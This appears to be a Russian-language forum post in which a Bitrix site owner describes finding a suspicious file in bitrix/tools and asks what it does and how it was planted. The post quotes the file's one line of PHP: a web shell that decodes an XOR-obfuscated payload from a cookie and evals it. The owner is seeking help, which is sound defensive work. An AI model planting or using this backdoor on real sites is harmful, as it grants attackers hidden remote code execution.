Сайт работает, как и работал. Внешне и функционально всё окей.
Чисто случайно заметил в каталоге bitrix/tools файл с названием obama_chmo.php.
Содержимое его состоит из одной строчки:
<?php error_reporting(0);$c=base64_decode($_COOKIE["8f319ac0f6ccf808309a04caa49bb4ab"]);$d=(string)NULL;for($i=0;$i<strlen($c);$i++)$d.=chr(ord($c[$i])^42);eval($d);
Первый вопрос - что это код выполняет?
Второе - в бэкапах сайта посмотрел, файл присутствует минимум две недели, но возможно и больше, так как глубина архива две недели). При этом дата его изменения обновляется от бэкапа к бэкапу.
Какие варианты, как он туда попал, а возможно и не он один?
Фактически можно считать, что скомпрометировано всё, конечно.
Простой